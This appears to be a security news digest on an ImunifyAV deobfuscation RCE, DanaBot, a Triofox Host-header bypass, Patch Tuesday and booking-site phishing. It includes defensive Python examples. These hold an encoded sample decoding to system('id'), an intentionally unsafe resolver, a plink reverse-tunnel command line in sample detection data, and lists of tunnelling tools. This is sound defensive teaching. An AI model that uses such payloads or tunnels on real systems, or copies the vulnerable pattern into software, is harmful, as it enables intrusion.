Critical ImunifyAV flaw exposes millions of Linux-hosted sites to RCE
The ImunifyAV malware scanner (part of Imunify360), widely used on shared Linux hosting environments, contains a critical remote-code-execution vulnerability in its AI-Bolit deobfuscation component: a malicious file placed where the scanner will pick it up can cause dangerous PHP functions to be executed during deobfuscation.
CloudLinux has released fixes; versions of ImunifyAV, ImunifyAV+, and Imunify360 prior to 32.7.4.0 are all impacted.
Because ImunifyAV is deployed by hosting providers at the server level (not just per website), a successful exploit could lead to full server compromise, especially if the scanner is running with elevated privileges.
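The class of bug described above is a deobfuscator that resolves a function name found inside the scanned file and calls it. The following toy is an added illustration of that pattern and its fix, not ImunifyAV or AI-Bolit source code: the regex, the decoder table and the stand-in `fake_system`/`fake_eval` functions are all assumptions made for the example. The unsafe variant lets the file choose any function in the runtime; the hardened variant only resolves names against a small allowlist of side-effect-free decoders and refuses everything else.

```python
"""
Toy illustration of the deobfuscation-executes-code pattern (added example,
not ImunifyAV or AI-Bolit source). A scanner that resolves a function name
found inside the scanned file and calls it must restrict that name to a
small set of side-effect-free decoders.
"""
import base64
import codecs
import re

# Matches the innermost  name('literal')  call in a fragment; the name is
# taken from the scanned file, so it is attacker-controlled.
CALL_RE = re.compile(r"([A-Za-z_][A-Za-z0-9_]*)\(\s*'([^']*)'\s*\)")

# Decoders a deobfuscator legitimately needs. Pure string transforms only.
ALLOWED_DECODERS = {
    "base64_decode": lambda s: base64.b64decode(s).decode("latin-1"),
    "strrev": lambda s: s[::-1],
    "str_rot13": lambda s: codecs.encode(s, "rot13"),
}

# Stand-ins for functions with side effects. A real PHP runtime would run a
# command or evaluate code here; this example only records the attempt.
executed = []

def fake_system(cmd):
    executed.append(("system", cmd))
    return ""

def fake_eval(code):
    executed.append(("eval", code))
    return ""

# Models "every function in the runtime is reachable by name".
RUNTIME_FUNCTIONS = {**ALLOWED_DECODERS, "system": fake_system, "eval": fake_eval}

class UnsafeCall(Exception):
    """Raised when a fragment names a function outside the allowlist."""

def _resolve(fragment, table):
    """Evaluate nested name('literal') calls inside-out using `table`."""
    while True:
        m = CALL_RE.search(fragment)
        if not m:
            break
        name, arg = m.groups()
        fn = table.get(name.lower())      # PHP function names are case-insensitive
        if fn is None:
            raise UnsafeCall(name)
        fragment = fragment[:m.start()] + "'" + fn(arg) + "'" + fragment[m.end():]
    if len(fragment) >= 2 and fragment[0] == fragment[-1] == "'":
        return fragment[1:-1]
    return fragment

def deobfuscate_unsafe(fragment):
    """Vulnerable pattern: whatever the file names gets called."""
    return _resolve(fragment, RUNTIME_FUNCTIONS)

def deobfuscate_safe(fragment):
    """Hardened pattern: only allowlisted decoders; everything else is refused."""
    return _resolve(fragment, ALLOWED_DECODERS)

if __name__ == "__main__":
    sample = "strrev(base64_decode('b2xsZWg='))"   # constructed benign sample
    hostile = "base64_decode('c3lzdGVtKCdpZCcp')"   # constructed: decodes to system('id')
    print(deobfuscate_safe(sample))                 # hello
    deobfuscate_unsafe(hostile)
    print(executed)                                 # [('system', 'id')]
    try:
        deobfuscate_safe(hostile)
    except UnsafeCall as e:
        print("refused:", e)
```

The hostile sample shows why the allowlist has to apply at every layer: the outer call is a harmless `base64_decode`, but its output is itself a call, and a resolver that keeps evaluating whatever appears will execute it. The lookup is also case-insensitive, because an allowlist that compares `system` but not `SYSTEM` is no allowlist in a PHP context.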
DanaBot resurfaces, resumes Windows infections after six-month shutdown
The DanaBot banking trojan has resurfaced in the wild with a new version 669, roughly six months after law enforcement’s “Operation Endgame” had disrupted its infrastructure.
The rebuilt command-and-control infrastructure now includes both Tor (.onion) domains and back-connect nodes, making it more resilient and harder to block.
Threat actors are using the updated DanaBot to steal browser-stored credentials, perform form-grabs, and potentially facilitate remote access; new cryptocurrency wallets (BTC, ETH, LTC, TRX) have been identified for stolen funds.
Attackers exploit Triofox antivirus feature to deploy remote access tools
Security researchers discovered that attackers exploited a critical authentication-bypass vulnerability (CVE-2025-12480) in Triofox’s administrative interface by spoofing “localhost” in the HTTP Host header, so that requests from remote clients were treated as local.
By abusing Triofox’s built-in antivirus feature, the attackers pointed the configured scanner at a malicious script they had uploaded; Triofox then launched that script with SYSTEM-level privileges, giving them remote code execution.
In their post-exploitation chain, the attackers deployed Zoho UEMS, Zoho Assist and AnyDesk for remote access, and used Plink and PuTTY to build SSH tunnels for lateral movement.
Use Acronis EDR process-behavior monitoring to detect and block unexpected SYSTEM-level AV-scanner launches, especially when paired with network tunneling tools like PuTTY or SSH.
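Two practical checks follow from the Triofox chain above: local-only functionality must be gated on the TCP peer address rather than on a client-supplied Host header, and a scanner path that launches script interpreters or is followed by tunnelling tools under SYSTEM is worth an alert. The block below is an added example, not Triofox code and not any vendor's detection rule; the log line format, the event tuple layout, and the binary name `av_scanner_placeholder.exe` are constructed for the example.

```python
"""
Added example (not Triofox code, not a vendor detection rule). A request-time
guard that keys off the socket peer, plus an offline sweep over constructed
log data that flags (a) remote clients claiming a loopback Host header and
(b) SYSTEM-level script hosts spawned by the AV-scanner path or tunnelling
tools. Formats, field names and binary names are constructed for the example.
"""
import ipaddress
import re

LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1"}

def host_header_name(host):
    """Lower-cased host part of a Host header value, with any port removed."""
    h = host.strip().lower()
    if h.startswith("[") and "]" in h:            # bracketed IPv6, e.g. [::1]:443
        return h[1:h.index("]")]
    if h.count(":") == 1:                         # name:port or IPv4:port
        return h.split(":", 1)[0]
    return h                                      # bare name, IPv4, or bare IPv6

def claims_loopback(host):
    return host_header_name(host) in LOOPBACK_HOSTS

def peer_is_loopback(remote_addr):
    try:
        return ipaddress.ip_address(remote_addr).is_loopback
    except ValueError:
        return False

def local_only_request_allowed(remote_addr, host):
    """Request-time guard for local-only endpoints: the socket peer decides;
    the client-supplied Host header is ignored entirely."""
    return peer_is_loopback(remote_addr)

# Constructed access-log lines: remote_addr host=<Host header> "<method> <path>" <status>
LOG_RE = re.compile(r'^(\S+) host=(\S+) "(\S+) (\S+)" (\d{3})$')
SAMPLE_LOG = """\
203.0.113.7 host=localhost "GET /setup" 200
127.0.0.1 host=localhost "GET /setup" 200
198.51.100.23 host=files.example.test "GET /login" 200
203.0.113.7 host=127.0.0.1:443 "POST /setup" 302
"""

def find_host_spoofing(log_text):
    """(remote_addr, method, path) for requests whose Host header claims
    loopback while the peer address is not loopback."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        addr, host, method, path, _status = m.groups()
        if claims_loopback(host) and not peer_is_loopback(addr):
            hits.append((addr, method, path))
    return hits

# Constructed process-creation events: (user, parent_image, image, command_line).
# "av_scanner_placeholder.exe" stands in for whatever binary launches the AV engine.
SAMPLE_EVENTS = [
    ("NT AUTHORITY\\SYSTEM", "av_scanner_placeholder.exe", "engine.exe", "engine.exe --scan D:\\shares"),
    ("NT AUTHORITY\\SYSTEM", "av_scanner_placeholder.exe", "cmd.exe", "cmd.exe /c C:\\ProgramData\\stage.bat"),
    ("NT AUTHORITY\\SYSTEM", "cmd.exe", "plink.exe", "plink.exe -N -R 3389:127.0.0.1:3389 user@203.0.113.9"),
    ("DOMAIN\\alice", "explorer.exe", "putty.exe", "putty.exe"),
]
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
TUNNEL_TOOLS = {"plink.exe", "putty.exe", "ssh.exe"}

def find_suspicious_system_children(events, scanner_image):
    """Events where a SYSTEM-level process is either a script host spawned by
    the scanner path or a tunnelling tool. An interactive PuTTY run by an
    ordinary user is deliberately not flagged."""
    hits = []
    for user, parent, image, _cmd in events:
        if not user.upper().endswith("\\SYSTEM"):
            continue
        scanner_spawned_script = (parent.lower() == scanner_image.lower()
                                  and image.lower() in SCRIPT_HOSTS)
        if scanner_spawned_script or image.lower() in TUNNEL_TOOLS:
            hits.append((user, parent, image))
    return hits
```

The guard ignores the Host header on purpose: any value the client can type is not evidence of where the connection came from. The log sweep is the retrospective version of the same rule, and it normalises ports and bracketed IPv6 literals so that `127.0.0.1:443` or `[::1]:8443` are not missed.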
Microsoft patches zero day and 63 vulnerabilities in November Patch Tuesday update
Microsoft released its November 2025 security update, patching 63 vulnerabilities, including one actively exploited zero-day (CVE-2025-62215) in the Windows Kernel.
The update also addresses 16 remote-code-execution (RCE) flaws, four “Critical” vulnerabilities, 29 elevation-of-privilege issues, information disclosure bugs, and more.
The zero-day is a race condition in the Windows Kernel that lets a local attacker with limited privileges escalate to SYSTEM.
Mass phishing campaign targets hotel bookings with 4,300 fake sites
A sophisticated phishing campaign by a Russian-speaking threat actor created over 4,300 fake travel booking websites, impersonating brands like Booking.com, Expedia, Agoda, Airbnb and more.
The phishing kit customizes the fraudulent site appearance based on unique URL parameters, presenting a realistic hotel booking flow to victims, complete with fake CAPTCHA and Cloudflare-like loading screens.
When victims enter credit card details, the site records them and then shows a fake 3-D Secure “verification” widget to collect expiration dates and CVV codes, exfiltrating the complete payment information.